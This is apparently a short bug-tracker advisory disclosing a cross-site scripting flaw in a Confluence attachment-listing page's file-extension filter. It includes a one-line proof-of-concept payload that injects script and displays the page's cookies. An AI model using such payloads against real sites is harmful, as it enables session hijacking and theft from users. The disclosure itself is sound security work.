XSS vulnerability in app/spaces/listattachmentforspace.action

2007-07-19T12:41:10
ID ATLASSIAN:CONF-8950
Type atlassian
Reporter felho
Modified 2017-02-17T05:35:50

Description

Description: XSS via the "Filter By File Extension" field in app/spaces/listattachmentforspace.action.

Exploit: blah"><script>alert(document.cookie)</script><x x="